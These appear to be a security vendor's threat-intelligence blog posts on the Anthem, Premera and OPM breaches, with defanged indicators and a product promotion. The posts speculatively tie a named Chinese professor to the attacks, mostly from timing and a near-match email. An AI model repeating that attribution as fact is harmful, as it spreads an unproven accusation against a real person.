Advanced Persistent Threat


ThreatConnect and Maltego

ThreatConnect® has partnered with Malformity Labs LLC to develop a full transform set that allows for data from ThreatConnect to be integrated with the capabilities of Maltego.

All ThreatConnect customers can take advantage of our partnership with Malformity Labs LLC and use the Maltego transform set through the ThreatConnect®  API and a provided transform server. Customers can use this to:

  • Visualize the relationship between incidents, threats, adversaries, and indicators,
  • Uncover relationships between your private data in ThreatConnect and Community Data,
  • Leverage attributes belonging to indicators and threats to create Maltego graphs without losing any of the contextual data within ThreatConnect, and
  • Pivot from ThreatConnect data and external open source data sources using other transform sets within Maltego.

With more than 100 transforms to query and pivot through ThreatConnect’s data, users can easily model threat and the relationships between malware, domains, IPs, and other indicators to the incidents they were observed in, threats they are associated to, or adversary personas.  The use cases are numerous, but to help illustrate how it works we’ve picked a few scenarios to step through how a customer with access to ThreatConnect’s premium features could quickly visualize content and relationships. Click here to learn more about ThreatConnect’s premium service offerings.

You can click on any image below to view the graph larger. Want more?

Maltego Webinar Training

Take a deep dive into our 100+ Maltego transform set. View the webinar slides here.

Scenario1: Visualizing Incidents tagged with Ukraine

1. Imagine you are an organization that is particularly concerned about Ukraine themed targeting. The first step is to look for any instances of targeting, documented as Incidents, that are tagged with “Ukraine” within the ThreatConnect Subscriber Community.  This yields five results, shown below.


2. For additional high level context, you can then pull all other Tags related to these Incidents. This yields several other interesting results. You have a clear view of several interesting Tags now including multiple matches on the use of CVE-2012-0158. It is notable that all the Incidents are also tagged “Russia” and “Advanced Persistent Threat”.


3. Now, to take a deeper look at the context of the Incidents, you can pull all of their Attributesfrom within ThreatConnect. This yields more in-depth descriptions, sourcing, and write-ups of tactics, techniques, and procedures (TTP’s) used in the Incidents.


4. Since the focus is not on targeting to or from China, you can focus on the Incidents that don’t contain that Tag and are only Ukraine focused. Using Maltego, you can pull all the Indicators associated with the incidents of interest.  This yields six IPs, 27 MD5 hash values (including imphashes), 4 Domains, and 2 URLs, all with their own unique context and associations.


The indicators found can then be used to for monitoring and detection across the network. You can also continue to pivot to discover other relationship on the Indicators in the ThreatConnect Subscriber Community, in other ThreatConnect public Communities, within your own private organization data in ThreatConnect, or by leveraging other Maltego transforms to look for data sources external to ThreatConnect. The possibilities are endless.

Scenario 2: Pivoting on Malicious Registrants from Reverse Whois data, Passive DNS, and DNS monitoring.

1. In this scenario, you can start by taking a domain registrant email address* whose domains are known to show up as malware callbacks.


2. Next, pivot via a transform to pull the Adversary entity associated with this email address.threatconnect-maltego-6

3. Next, leveraging a running Track on the registrant email address within ThreatConnect, you can discover any second level registered domains associated with that email address. With passive DNS (pDNS) integration you can discover any third level domains that have been observed “in the wild” as well. One transform query on the graph below shows all domains associated to the Adversary. For the sake of the size of the graph, we’re looking at just a small subset of the known domains.


4. Now, you can go even deeper and utilize the DNS resolution monitoring for domain indicators within ThreatConnect to observe any overlap in IP address resolutions with date and time of resolution annotated. This yields 22 IP addresses for the over 80 domains in your subset.


Some of the IP addresses will undoubtedly be parking IPs (such as the loopback, but others will show historic trending of use of the IP for Command and Control. Leveraging passive DNS again within ThreatConnect, you could check to see if any other suspicious domains have resolved to these IP addresses and assess them further.

This allows you to not only use these domains and indicators as IOC’s across your network, but you can now proactively monitor known infrastructure such as known Command and Control IP’s, domains, and the registrant address itself for activity. This creates a predictive defense against a known adversary, following their movements using concepts true to the Diamond Model of Intrusion Analysis.

For more information on how you can start taking advantage of the ThreatConnect and Maltego partnership, contact us today.


OPM Breach Analysis: Update

OPM Breach Analysis

As highlighted in our recent webinar with Rick Holland, when there is a security event of great magnitude, organizational leadership will want to know as much as possible about the technical WHAT and HOW, as well as the WHO and the WHEN.

In many cases, not all of these questions can be answered definitively; however, our inability to answer specific questions does not negate the intelligence requirement, nor does it allow the decision maker to sidestep the decision point that they face. Below are some common questions that we have been asked over the past few days from a variety of organizations regarding our analysis of the recent OPM breach, of which we have included a recap of public reporting to support our position(s).

Who do we believe is responsible?

Based on open source research and technical analysis, we believe that Chinese-based actors operating on behalf of the government of the People’s Republic of China (PRC) are responsible for the 2015 OPM breach. Although the specific group(s) responsible for this activity have proven to be somewhat amorphous, many independent researchers and threat intelligence analysts with familiarity of this ongoing activity will concur that the ultimate benefactor of the stolen data is the central government in Beijing.

We stress that it is most likely a cohort of Chinese actors resourced and directed by a common benefactor. The diversity of expert opinion and ambiguity which the security industry places on this particular threat may have been by design.  This could lend more credence to the working “Digital Quartermaster” theory originally introduced by FireEye and recently referenced within PricewaterhouseCooper (PWC) UK’s analysis of Scanbox II Threat Intelligence Bulletin, which featured facets of this particular threat.

One thing for certain is that despite the common uncertainty and consensus, this activity has been the catalyst for increased shared awareness, technical information sharing and analytic collaboration.

Why we believe it is China

  • We feel that there are transitive properties associated with the technical aspects of the activity observed thus far.
    • We can strongly tie Chinese based actors to faux Wellpoint (Anthem), Premera, Empire BlueCross Blue Shield and CareFirst themed infrastructure.
    • We can tie infrastructure observed within a campaign that targeted a Virginia-based defense contractor VAE, Inc. to a named Chinese professor at Southeast University with ties to Beijing TopSec.
      • This campaign used the Sakula malware with the same digital signature seen in the Wellpoint themed campaign. This infrastructure was configured for survivability within VAE, Inc. enterprise.
      • Activity and dates associated with the faux VAE, Inc. infrastructure align with the timeline of a hacking competition sponsored by the Chinese Professor, Southeast University and TopSec Beijing, both with organizational ties to the Ministry of State Security (MSS).
    • We can strongly tie malicious infrastructure that maintains an Office of Personnel Management (OPM) theme to registration patterns observed with the faux VAE, Inc. themed infrastructure.
      • The actors used GoDaddy to register faux VAE, Inc. and OPM themed domains.
      • In both instances, actors falsified domain registration data with Marvel “Avengers” themed first and last names.
      • Attackers also used “throw away” GMX email accounts that maintained a pattern of <10 random alphabetic characters>[.]com.
      • The timeline of faux OPM themed infrastructure activity is congruent with this official OPM timeline.

Have we seen this type of activity before?

The theft of government PII, and even a breach into OPM’s network, is nothing new.  In 2013, the private firm USIS (a contractor retained by OPM to conduct background investigations on federal employees) reported falling victim to a sophisticated state-sponsored network intrusion. This breach received widespread coverage and also great scrutiny and criticism from regulators on Capitol Hill.

As time went on, details of the compromise began to spring forth. In a report compiled by Stroz Friedberg, the investigations revealed that the attackers had gained access to USIS networks via an unidentified SAP enterprise resource planning (ERP) software package vulnerability.  Fast forward to March 2014, just a few months after the USIS hack, OPM would be breached, first announcing the breach in July 2014.

Additionally, consider the Wellpoint/Anthem, Premera, Empire and CareFirst hacks all had one thing in common: they are all part of the Blue Cross Blue Shield Association.  BCBS provides healthcare services to the Federal workforce.

In the case of the Spring 2015 healthcare breaches, we have reported in the past that the attack nexus was indeed China, likely state-sponsored in nature, and relied upon the Sakula malware to gain initial entry.  Additionally, as was the case in the USIS and OPM breaches, similar PII data was targeted (names, employment history, social security numbers, etc.).  All of these things considered suggest a greater degree of correlation as opposed to mere coincidence.

Were there any previous indications or warning?

In 2014, Novetta and a number of supporting industry organizations including ThreatConnect banded together to produce Operation SMN: Axiom Threat Actor Group Report, a detailed report containing information pertinent to Chinese APT activity with an emphasis on HiKit malware. Of note, the report stated “Among the industries we observed targeted or potentially infected by Hikit [included] Asian and Western government agencies responsible for [a variety of services such as] Personnel Management.

A statement from such an industry group should have served as a key warning to government entities which were charged with conducting Personnel Management and warehousing PII.

Where did the HiKit Rootkit Originate?

At the 2015 Kaspersky Security Analysis Summit, Kris McConkey with PricewaterhouseCooper (PwC) UK delivered a compelling presentation based on research from fellow PwC Chinese research analyst Michael Yip.


McConkey  highlights the development of Adversary Intelligence surrounding a Chinese-based actor likely responsible for developing the HiKit capability as well as associations with a particular ZoxPNG sample. Both HiKit and ZoxPNG malware would be considered “tier one” unique custom capabilities, as opposed to some of the more lower end, commonly distributed implants such as ZxShell, PlugX, Gh0st or PoisonIvy.


It is critical to highlight that we are not drawing lines between Axiom / Hikit and current activity, other than to note that Chinese actors posed legitimate threat to Western government personnel management organizations.  Irrespective of which threat posed the greater risk, there were indications that the Chinese maintained both capability and intent to target OPM as witnessed in 2014.

Is the OPM themed infrastructure related?

Based on our current understanding of the attackers and this activity, ThreatConnect suspects that the recent OPM attackers may have chosen the specific infrastructure naming convention (opmsecurity[.]org and opm-learning[.]org) to emulate an official OPM training resource that has been maintained outside of the OPM enterprise for some time. This emulation technique has been observed consistently across these seemingly related events.

If we are to couple the terms OPM (both Security AND learning) within a .org TLD, we identify the following web resources.


These online training resources currently fall outside of standard .gov enterprise and ironically provide online training and security awareness training services for OPM as well as numerous other federal departments, agencies and commercial clients.

Analyst Comment: Currently there is no evidence that suggests golearnportal[.]org has been co-opted or is compromised in any way.



As we highlighted in late February, the domain opm-learning[.]org was registered on July 29, 2014 by “tony stark” (vrzunyjkmf@gmx[.]com) and is observed active within pDNS as early as July 30, 2014, resolving to 50.117.38[.]170. This IP belongs to Egihosting, (EGI) a company based out of California, but it is known to resell VPS services in China.

EGI’s network was designed with redundancy in mind, including a multi-homed setup of upstream providers like Global Crossing, nLayer, HE.NET and Highwinds. Our network has excellent direct connectivity to China and Asian networks and provides optimal routes to both domestic and other international destinations, including the often problematic and congested Chinese and Asian markets.


It is important to note that OPM first announced the first breach on July 10, 2014. However, the actors would register opm-learning[.]org 19 days later, on July 29, 2014, at which point the domain resolved to a domestic VPS service which boasts optimal routes to China on July 30, 2014. At the time of our reporting in February 2015, we assumed that the opm-learning[.]org infrastructure was a remnant of ongoing OPM 2014 breach activity. We now assess that opm-learning[.]com was likely either:

  • Used as a means for the original actors to reconstitute lost access from the initial 2014 breach.


  • Used by another group or team which was moving to establish new access.

Needless to say, a 19 day window from the 2014 breach announcement to establishment of new infrastructure is a noteworthy datapoint.


On the heels of the recent 2015 OPM breach announcement, we worked with our friends at DomainTools who helped us apply a custom search technique that we had been experimenting with, from which we shared noteable outputs to our ThreatConnect Community. A refinement of that experiment yielded the domain opmsecurity[.]org.

Retrospective analysis of this domain indicates that it was registered on April 25, 2014 (four days prior to the We11point[.]com) where the first observed instance of it active (outside of GoDaddy resolutions) was early as December 18, 2014 resolving to 148.163.104[.]35 until June 3, 2015 (a day before the official OPM breach announcement).

According to an official OPM FAQthe intrusion occurred in December 2014, OPM became aware of the intrusion in April 2015, and became aware of potentially compromised data in May of 2015. This timeline is congruent with technical observables associated with the opmsecurity[.]org infrastructure. ThreatConnect assesses with high confidence that the opmsecurity[.]org infrastructure was leveraged within the 2015 OPM breach.


The IP address 148.163.104[.]35 also resolved the suspicious No-IP dynamic domains ladygagagaga.serveblog[.]net and jamlitop3.zapto[.]org from April 27, 2015 to early May 2015.


As we research both ladygagagaga.serveblog[.]net and jamlitop3.zapto[.]org we find that as of June 9, 2015, both C2’s resolve to 107.167.75[.]138, a Chinese VPS Provider 370Host[.]net, purportedly within a colocation facility in Phoenix Arizona.

What malware was used?

ThreatConnect assesses with moderate to high confidence that the opmsecurity[.]org domain was likely used within a PlugX variant based on a single VirusTotal URL submission. This URL contains the C2 callback URI structure “/DJMoqoirjvmimzzv/view/update?id=”, which is associated with the malicious DLLs MD5: 683a3e4448b7254d52363d74e8687f36 and MD5: c28ecee9bea8b7465293aeeef4316957. These DLL binaries are detected by multiple antivirus vendors as PlugX, which is likely an accurate malware classification considering the use of the “/update?id=” callback URI segment is specifically associated with the Destroy RAT aka Sogu family of malware, the direct precursor to PlugX.

Similar binaries found in VirusTotal are as follows:

  • 23DE2AFF9DBE277C7CE6ABBD52E68CE6
  • 4CED16CEB9C3BC50787303EC5C4DA0B8
  • BDDF02095971F6A309C68CFDFAAA3648
  • C51F43F860535CFA9B2F4528A5FE2877

Each of these binaries contain the hardcoded command and control IP address 46.21.150[.]165 (Fremont, California). This IP address also has passive DNS resolution history from the following suspicious domains:


This domain was initially registered by abit572@yahoo[.]com, then switched over to a nine character, likely pseudorandom, GMX registrant of ton0251sx@gmx[.]com. The fact that this domain is registered by a seemingly random registrant is noteworthy considering a similar registration profile was used in the faux OPM domains listed above. This domain may be a typo-squat impersonating a reference to Binghamton, a town and State University in New York.


This domain was registered in 2012 by 904726926@qq[.]com, then again in April 16, 2014 by the Chinese reseller “Li Ning” li2384826402@yahoo[.]com who has been identified previously in similar activity.


This dynamic DNS domain currently resolves to 103.6.207[.]37 (Indonesia).

The use of a GMX registrant and the Li Ning reseller in the overlapping domains closely mirrors the registrant profiles associated with the Sakula campaign activity from the Wellpoint and VAE, Inc. targeting campaigns as well as in the faux OPM domains highlighted above. This leads ThreatConnect to assess with moderate confidence that the PlugX APT malware activity associated with the VirusTotal URL and related hashes is attributed to the actor that is using Sakula and leveraging the faux OPM domains. The timing of registrations and resolutions between the original June 2014 OPM breach announcement and the 2015 OPM breach announcement is noteworthy.


To many, it may seem absurd that a foreign government would want to gather a database of federal employee PII. Some have noted that this information is likely of greater value to criminal actors, and that it wouldn’t be nearly as helpful to enable spearphishing in the future, as social media profiles often hold higher quality intelligence used to socially engineer a victim.  While all of this is true to varying degrees, consider that we may be looking at this from the narrow perspective of the short-term.  Building up a PII database could fulfil a number of strategic goals well into the future.  The long game strategy is characteristic of Chinese thought, and may very well be what is at play here.

Want to learn more and follow the latest updates? Register for a free organization account here or an individual account of ThreatConnect below to get started.

Premera Latest Healthcare Insurance Agency to be Breached

Similarities with Wellpoint/Anthem Event Should be Understood

The recent announcement from Premera Blue Cross Blue Shield that it has fallen victim to a sophisticated cyber attack that reportedly compromised the medical and financial data of 11 million members is the latest in a series of high-profile cyberattacks targeting the medical and healthcare industry. ThreatConnect’s analysis has overturned similarities between independent Wellpoint and Premera-themed events.

Before we dig into the analysis, it is important to understand our methodology and goal in publishing our findings. As we see it, threat intelligence begins when you can connect the dots of past events, preferably from multiple independent data sources, to make sense of the threats that you may be seeing now – which then allows you to make better strategic decisions to mitigate risks in the future. The goal of this third party analysis is not to draw conclusions of exact details of either the Anthem or Premera breaches, but rather begin to answer the question that many observers ask in the wake of such a revelation, “How does this impact me?”

To answer that question, you don’t need every detail of a specific organization’s intelligence. You just need the data actually relevant to you in a format you can digest. By calling to light common indicators of compromise and other key similarities between notable events, organizations can break through the log jam of speculation and make informed decisions and formulate a risk mitigation process.

In February 2015, ThreatConnect published an in-depth blog post of its third party analysis of notable events which maintained Anthem/Wellpoint theme. Some of the biggest takeaways from this incident were:

  • Context suggested possible Chinese state-sponsored involvement.
  • Malicious binaries used in several campaigns were digitally signed by “DTOPTOOLZ Co.” a very unique stolen certificate.
  • A common character replacement technique was used in the staging of malicious Premera and Wellpoint themed infrastructure – both observed within five months of each other.

All of those points create very compelling technical associations of what would otherwise be seemingly unrelated events. As we continued to uncover the nuanced details, we saw mounting evidence that this may not be an isolated activity. To demonstrate this, let’s walkthrough the analysis.

One of the strongest initial indicators that tipped us to the possible targeting of Anthem/Wellpoint was the registration and staging of malicious domains using the “we11point[.]com” theme, which was clearly masquerading as legitimate Wellpoint infrastructure. Notice the subtle character replacement technique used here to obfuscate the nefarious activity, as this will be an important pivot point in the near future. Through our analysis, we were able to determine that the Anthem/Wellpoint infrastructure staging began as early as April 2014.

Given that the DTOPTOOLZ certificate was so specific, we had strong inclinations to believe that other samples using this digital signature would likely be related to other events.

Pivoting off of the stolen DTOPTOOLZ certificate lead to the discovery of another malicious file first observed in December 2013. The binary was engineered to call out to an IP address that had previously hosted the imposter domain prennera[.]com as early as December 11th 2013 – the very same day the malware was first observed.  Again, note the character replacement technique subsequently used in the Anthem/Wellpoint faux infrastructure.

As reported in our The Anthem Hack: All Roads Lead to China blog post, the use of the stolen certificate was not in fact unique to the targeted Anthem attack, but rather appeared to be tradecraft of a very sophisticated threat group targeting more than one organization that is plausibly interested in collecting Personally Identifiable Information (PIIs) of individuals associated with the U.S. Federal Government. Premera Blue Cross Blue Shield may have been one such organization.

All things considered, it appears feasible that contrary to initial media reports, it’s possible that attempts to breach or at least test weaknesses of Premera may have occurred as early as December 2013.

Interested in learning more? Register for a free ThreatConnect account.

The Anthem Hack: All Roads Lead to China

UPDATE: Premera Latest Healthcare Insurance Agency to be Breached

When news of the Anthem breach was reported on February 4th, 2015, the security industry quite understandably went wild. A breach of this magnitude was certainly unprecedented.  Naturally, many industry professionals were keenly interested in digging into this incident to see what could be uncovered, and the research team at ThreatConnect was no exception.  Thanks to our powerful API and third-party partner integrations, we were able to use ThreatConnect to quickly uncover a wealth of intelligence even when initially hindered by a relative lack of investigative lead information and context, a key requirement of any Threat Intelligence Platform (TIP). However, before we delve into what we were able to uncover, let’s briefly review the facts as they stood in the wake of the initial discovery announcement.

What We Know:                                                                                                                                                     

On the morning of February 4th, 2015, several major news outlets broke the story that Anthem, Inc.’s network defenses had been breached. According to a statement from Anthem’s CEO, the company fell victim to a “very sophisticated external cyber attack,” and the hackers “obtained” the personally identifiable information (PII) of approximately 80M customers.  This included social security numbers, birthdays, street addresses, phone numbers and income data – plenty of information to enable identity theft. This was a significant event for several reasons:

  • Anthem, formerly known as Wellpoint, is the largest managed healthcare company in the Blue Cross Blue Shield Association, and by extension, one of the largest healthcare organizations in the United States.  As such, any compromise, no matter how insignificant, would likely impact countless individuals.
  • Blue Cross Blue Shield provides healthcare coverage for about half the U.S. federal workforce.  This means that their information was potentially compromised too.
  • Unlike the Sony hack which was destructive in nature and meant to send a message for coercive purposes, the Anthem compromise was purportedly very covert, a fact which may suggest something about the adversary’s motives.
  • As of late February 2015, there have not been any indications that the exfiltrated PII data was immediately commoditized on the black market for the purpose of enabling identity theft, as was the case in the Home Depot Breach.

Filling the Gaps:

Obviously, these high-level observations do not provide cybersecurity researchers a great deal of information to work with. However, when presented within the context of a Threat Intelligence Platform (TIP), an incomplete trail of evidence can highlight intelligence gaps, a study of which can orient threat researchers towards their analytic objectives.  To this end, let’s examine what we wanted to discover in the context of the Anthem breach:

  • Who was responsible for the attack?
  • What was the objective of the attack?  Was it cyber theft, an espionage operation, or something different?
  • Who was targeted in the attack?  The answer to this question, obscured as it may be, would likely shed some light on the objective of the breach.
  • What was the timeline of the activity?

The real power of a Threat Intelligence Platform is demonstrated when you are able to collect and maintain a robust dataset of threat indicators, both past and present, which can help orient you in the right direction in the wake of a newly discovered breach.  Even when you do not have a good deal of information to start with (for example a file hash, or an IP address), you may find leads by pivoting through archived datasets until you uncover key pieces of the puzzle.  In the case of the Anthem breach, we were able to do just that.

Anthem Themed Infrastructure & Signed Malware:

In September 2014, the ThreatConnect Research Team observed a variant of the Derusbi APT malware family, MD5: 0A9545F9FC7A6D8596CF07A59F400FD3, which was signed by a valid digital signature from the Korean company DTOPTOOLZ Co. Derusbi is a family of malware used by multiple actor groups but associated exclusively with Chinese APT. ThreatConnect Research began tracking the DTOPTOOLZ signature for additional signed malware samples and memorialized them within our Threat Intelligence Platform over time.

Analyst Comment: The DTOPTOOLZ signature has also been observed in association with Korean Adware that is affiliated with the actual DTOPTOOLZ Co. This adware should not be confused with the APT malware that is abusing the same digital signature.

Later, in mid-November we discovered another implant that was digitally signed with the DTOPTOOLZ signature. This implant, MD5: 98721c78dfbf8a45d152a888c804427c, was from the “Sakula” (aka. Sakurel) family of malware, a known variant of the Derusbi backdoor, and was configured to communicate with the malicious command and control (C2) domains extcitrix.we11point[.]com and www.we11point[.]com. Through our Farsight  Security passive DNS integration, we uncovered that this malicious infrastructure was likely named in such a way to impersonate the legitimate Wellpoint IT infrastructure.

Passive DNS and historic DomainTools Whois data also provided insights that helped establish an initial timeline dating back to April 2014, when the faux domains came into existence and were later operationalized by the attackers. A Threat Intelligence Platform should allow for analysts to easily put together and organize such insights, collaborate around relevant analysis internally, and share the finished analysis with external industry groups and organizations. In the hopes that our community members could benefit from or provide further insight into this suspicious incident, we immediately shared our threat intelligence including indicators, signatures and analytical context to the ThreatConnect Medical and Health Community on November 13, 2014. This included sending out a notification to all stakeholders as well as our followers on Twitter.

When the Anthem breach later came to light in early February, we re-shared the signatures, indicators and context freely to the entire ThreatConnect user base. As we dug further, we expanded our understanding of the malicious we11point[.]com infrastructure, taking particular interest to the subdomains such as “extcitrix.we11point[.]com and “hrsolutions.we11point[.]com”. Note the “citrix”  and “hr” (human resources) prefixes that the adversary used to mirror legitimate remote infrastructure and employee benefits resources in the May 2014 timeframe. This provided initial insights as to the likely targeting themes and or vectors in which the adversary may have used when initiating their targeting campaign.


The fact that the malicious infrastructure closely mirrored other legitimate Wellpoint infrastructure supported our hypothesis that the Derusbi / Sakula malware was configured to operate and persist within a specific target enterprise.

Possible Premera Blue Cross Infrastructure:

Retrospective analysis of other targeted malware samples using the DTOPTOOLZ Co. digital signature led to the identification of an “HttpBrowser” / “HttpDump” implant MD5: 02FAB24461956458D70AEED1A028EB9C (OpenOfficePlugin.exe), which was first observed on December 11, 2013. Although this malware sample is not Derusbi / Sakula, it too is strongly believed to be associated with Chinese APT activity and in fact may have also been involved in a Blue Cross Blue Shield targeting campaign as early as December 2013.


This particular binary is configured to connect to the static IP address 142.91.76[.]134. Passive DNS of this IP indicates that on December 11th, 2013, the same date as the malware sample was observed, the domain prennera[.]com also resolved to 142.91.76[.]134. It is believed that the prennera[.]com domain may have been impersonating the Healthcare provider Premera Blue Cross, where the attackers used the same character replacement technique by replacing the “m” with two “n” characters within the faux domain, the same technique that would be seen five months later with the we11point[.]com command and control infrastructure.

Section Summary:

  • The Derusbi / Sakula malware implant types are unique in that they have traditionally been seen within Chinese APT espionage campaigns.
  • The “HttpBrowser” / “HttpDump” malware implant (while a different family of malware than Derusbi / Sakula) is also believed to be of Chinese origin, and was also digitally signed with the DTOPTOOLZ digitalsignature. This implant connected to a C2 node that overlapped with prennera[.]com.
  • We believe that the prennera[.]com domain may be impersonating Premera Blue Cross (, using a similar character replacement technique seen in the we11point[.]com campaign.


VAE Inc. Themed Infrastructure & Signed Malware

Another powerful attribute of ThreatConnect is the ability for analysts to logically group items such as atomic indicators, related documents or signatures, all of which may include individualized custom context enrichments and associations. Over time, the ability to memorialize groupings of related or like activity allows analysts to quickly uncover non-obvious relationships within their private datasets. This is exactly what happened as we continued to investigate these incidents.

As industry analysts and media speculated Chinese APT involvement in the Anthem breach, our focus into the Derusbi / Sakula malware signed with the DTOPTOOLZ Co. digital signature shifted from the we11point[.]com incident to another cluster of activity that occurred later in May 2014. We immediately reviewed Incident 20140526B: vaeit APT, an incident that we initially shared to our Subscriber Community on September 29, 2014 after conducting retrospective analysis.   Well-VAE-Overlaps Just as was the case with the we11point[.]com and prennera[.]com incidents, the VAE, Inc. incident is also believed to be associated with Chinese APT espionage activity. In this case the adversary also used Derusbi / Sakula malware that was signed with the DTOPTOOLZ Co. digital signature and configured to communicate with faux infrastructure appearing to be masquerading as internal resources for the Department of Defense Contractor VAE, Inc. Additionally, in response to an inquiry from KrebsOnSecurity, VAE, Inc. would later confirm that it had indeed been a target of a failed spearphishing attempt in May 2014 which used the malicious faux VAE, Inc. themed domain.

The targeted incident relied upon the Sakula executable MD5: 230D8A7A60A07DF28A291B13DDF3351F which had a XOR 0x9A encoded C2 callbacks to the IP address 192.199.254[.]126 (registered to Wehostwebsites[.]com – “Tom Yu” of Baoan, Shenzhen City, Guangdong Province, China) as well as a hardcoded callback to sharepoint-vaeit[.]com. Passive DNS of the static C2 IP 192.199.254[.]126 revealed a single suspicious domain of interest – topsec2014[.]com.  This domain had historic resolution around May 8, 2014 within a month of the first observed Sakula activity using the IP 192.199.254[.]126 as C2.

Using historic Whois, we discovered that topsec2014[.]com was initially registered by li2384826402@yahoo[.]com on May 6th, 2014. Although the li2384826402@yahoo[.]com registrant is likely a reseller given that it has been observed registering several thousands of other domains, the fact that it was used to register both the faux VAE, Inc. C2 infrastructure and the overlapping domain topsec2014[.]com within the same month suggests that there may be a relationship between the client of the reseller for the VAE, Inc. infrastructure and the client for topsec2014[.]com.


Just four minutes after the initial registration of topsec2014[.]com, the Whois records were updated from the initial registrant, Li Ning – li2384826402@yahoo[.]com to TopSec China – TopSec_2014@163[.]com.  This domain record has been unchanged since May 7th 2014. The we11point[.]com infrastructure and by extension the faux VAE Inc. infrastructure is associated with Cluster 2 of the ScanBox framework by PwC. The latest PwC update to ScanBox states that there are “links between the domain allegedly used in the Anthem hack ( to Cluster 2 through shared WHOIS details.”

OPM Themed Infrastructure

One notable pattern was how the domain Whois registration information for the VAE, Inc. themed infrastructure was quickly updated and obfuscated with pseudorandom 10 character email addresses and using the names of various comic book characters from the Iron Man franchise. This comic-themed naming convention has been previously documented by our friends at Crowdstrike in what they characterize as being associated with a Chinese APT group they have dubbed “Deep Panda”.

Leveraging our DomainTools partnership, we were able to correlate the outlier domain opm-learning[.]org. This domain was also purportedly registered by the Iron Man movie hero “Tony Stark” on July 28, 2014. This infrastructure naming convention suggests a possible Office of Personnel Management (OPM) theme. However, in this case we lacked any specific sample of malware to verify our initial suspicions that this infrastructure was operational. The possible OPM reference in the domain name is noteworthy considering it was revealed in July of 2014 that OPM had been compromised by a likely state-sponsored Chinese actor in mid-March of that year. The fact this domain was registered after the breach occurred suggests that OPM could be an ongoing direct target of Chinese state-sponsored cyber espionage activity.

Our attention then turned to the FBI Flash Report A-000049-MW that was publicly reported by Brian Krebs on February 6th, 2015. This FBI Flash Report was issued on January 27th, 2015, the same day an Anthem administrator detected suspicious activity according to an internal memo. This memo goes on to indicate that the FBI would not be party to the Anthem breach until they were notified on January 29th, 2015; based on these facts we assess with high confidence that it is very unlikely that the FBI Flash Report was directly related to the Anthem breach. Rather, we suspect that the FBI flash report likely references the USIS breach that was announced on August 6, 2014, or the previous OPM breach, considering the statement that the breach involved “compromised and stolen sensitive business information and Personally Identifiable Information (PII) from US commercial and government networks through cyber espionage.”

The malware referenced within the FBI Report is associated with a Derusbi backdoor subvariant named “InfoAdmin” / “Kakfum” where the FBI specifically references open source reporting of “Deep Panda” as being related to the malware observed in the attack. The malicious infrastructure highlighted in the report are the domains images.googlewebcache[.]com and smtp.outlookssl[.]com. Both of these top level domains were included with other related domains, all of which were shared on September 16th, 2013 to the ThreatConnect Subscriber Community in Incident 20130823C: Some.Trouble APT Domains, roughly a year and half prior to the FBI Flash report.

It is important to mention that both the domains images.googlewebcache[.]com and smtp.outlookssl[.]comas were also previously identified in an October 2014 PwC blog post as seen within Cluster 1 of the Scanbox framework, while the Sakula activity with we11point and VAEIT is contained within Cluster 2 of that report. This implies that the actor referenced within the FBI Flash report uses shared capabilities (in this case the ScanBox kit) with the Sakula / we11point actor.

Section Summary:

  • The Derusbi / Sakula malware seen in both the we11point[.]com and VAE Inc. campaigns were structurally the same and digitally signed with the DTOPTOOLZ signature.
  • The emerging theme is that this particular signature and family of malware is highly indicative of a particular Chinese APT activity.
  • Within this web of malicious infrastructure, there is an interesting overlap with the topsec2014[.]com domain and attack infrastructure.
  • ThreatConnect Research identified a domain opm-learning[.]org that had a similar superhero themed WHOIS registrant to the Sakula / VAE Inc. infrastructure. The possible OPM reference is noteworthy considering the Office of Personnel Management (OPM) was compromised in March 2014. Additionally, an FBI Flash Report 0000-49MW referenced indicators that were possibly associated with the USIS hack and a Derusbi variant called “Kakfum” / “InfoAdmin”. Both the FBI Flash infrastructure and the Sakula / VAE Inc. infrastructure are tied to the capability usage of the ScanBox framework, residing in Clusters 1 and 2 respectively.

Unveiling Song Yubo and Southeast University:

The Professor

We conducted open source research in pursuit of further information on the TopSec_2014@163[.]com email registrant.  A keyword search returned several results for “topsec2014@163[.]com” in association with a number of academic institutions in Nanjing, China.  Although the email address wasn’t an exact match to the topsec2014[.]com domain registrant (notice the absence of the underscore), such a similarity warranted further investigation. Screen Shot 2015-02-25 at 5.20.37 PM We examined the links for any relevant intelligence, and discovered that nearly all of the search results led to pages that contained an announcement for an information security competition sponsored by the Southeast University-Topsec Information Security and Mobile Internet Technology Joint Research Center.  This entity appears to be a joint research venture between the University and Chinese networking giant Beijing Topsec Network Security Technology Co., a.k.a. Beijing Topsec.

Screen Shot 2015-02-23 at 9.22.35 AM

The announcements list a Professor “Song Yubo” as the point of contact for the event, and directs interested parties to his email address, topsec2014@163[.]com, for further questions.


According to his LinkedIn page, Song is a Teacher at the Southeast University, specifically interested in the field of telecommunications. Additionally, he is an avid researcher, and has published numerous academic papers on computer network exploitation on various e-journal publication sites, such as Google Scholar. Further, he lists skills such as “cryptography,” “penetration testing” and “computer network security,” etc. on his Research Gate profile.


As we continued to develop a profile on Professor Song, we began to have the sense that his interest in information security research strongly overlapped with that of someone who might be interested in or at least capable of conducting sophisticated cyber attacks. However, interests alone are not enough to warrant reasonable suspicion, so we had to do more digging.

Additionally, the soft link between TopSec_2014@163[.]com and topsec2014@163[.]com alone was not sufficient to make associations with any reasonable confidence, but as it turns out, Yubo has in fact been previously named as a person of interest in the context of offensive Chinese cyber activity.

The University

In March 2012, Northrop Grumman presented a commissioned report to Congress detailing Chinese cyber warfare capabilities. The report asserts with high confidence that both Song and the Information Security Research Center at Southeast University have received numerous state-sponsored research grants, and by extension, cooperated with the Government of China in conducting information security research and development (R&D).  As stated on Southeast University’s own website, the main purpose of these grants are to develop technical acumen amongst its students via providing support for “state-owned scientific research institutions, state key enterprises, government agencies and People’s Liberation Army (PLA) units.” relationshipsSoutheast University is one of only three Chinese academic institutes that receives funding from all five of the State grant programs. Song himself has also conducted his fair share of state-sponsored research, notably under the National Ministry of State Security 115 Program – a highly sensitive research grant to fund ambiguous information warfare R&D, almost certainly in support of PLA programs.

The Competition

As we can see, the evidence continued to stack up.  The real smoking gun, however, was when we began to notice a strong temporal overlap with the various stages of the TOPSEC Cup that Song and Beijing Topsec were organizing, and the registration dates of malicious infrastructure as well as the malware compilation dates.

Based upon the translated registration form that we obtained from Song Yubo’s personal Baidu document sharing account, open registration for the “TOPSEC Cup” began on May 4th, 2014 and would close on May 14th, 2014.

The details of the competition that were shared on the announcement are extremely ambiguous, and probably for good reason. The introductory paragraph mentions that the primary goal of the event is to facilitate the training and discovery of new talent, noting that exceptional participants would receive priority consideration for internships and jobs with Beijing Topsec.

